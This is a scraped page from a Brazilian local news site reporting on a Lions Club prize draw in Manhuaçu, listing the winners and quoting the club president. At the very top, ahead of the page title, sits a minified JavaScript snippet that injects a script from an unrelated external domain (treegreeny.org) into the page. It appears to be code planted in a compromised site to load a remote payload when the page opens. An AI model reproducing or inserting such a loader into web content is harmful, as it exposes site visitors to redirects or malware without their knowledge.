;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhuaçu-Lions Clube entrega prêmios ganhadores do Show de Prêmios. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhuaçu-Lions Clube entrega prêmios ganhadores do Show de Prêmios.

Após o Show de Prêmios do último domingo, 19, que atraiu uma multidão ao Parque de Exposições de Manhuaçu, o Lions Clube Flor de Manacá realizou nesta quarta-feira, 22, o penúltimo ato do evento, que foi a entrega oficial dos prêmios aos ganhadores. Representantes da instituição passaram às mãos dos sorteados os três veículos zero quilômetro, as duas motocicletas também zero quilômetro e a TV 60’’.
Os premiados foram Natali Hott Borel, do Córrego dos Hott, que levou uma das motos. A outra foi levada por Eliandro Portilho, do município de Carangola. Quem levou a TV foi o manhuaçuense Gedeon Leite. Um dos veículos Pálio foi para Marciano Lopes, de Santa Margarida. A pick-up Strada foi para José Marcelo Rodrigues, de Simonésia. Por fim, na cartela extra, quem levou o Pálio foi o manhuaçuense Augusto de Jesus.
José Marçal Filho, presidente do Lions Clube Flor de Manacá, se diz satisfeito com o resultado do evento. “O clube ficou extremamente feliz. A arrecadação será crucial para o início da edificação da sede própria, possibilitando ao clube expandir seus projetos e suas campanhas em prol das pessoas menos favorecidas do município” – comenta. Os envolvidos na organização manifestaram gratidão a todos os colaboradores, como empresários e o governo municipal de Manhuaçu, com colaboração direta do prefeito Nailton Heringer e alguns de seus secretários e servidores, que viabilizaram a realização do Show de Prêmios. Em quase 19 anos de história no município, esta foi a maior campanha já realizada pela entidade. Resta ainda o último ato, que é o relatório final e a prestação de contas às instituições de direito.

Secretaria de Comunicação Social de Manhuaçu

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.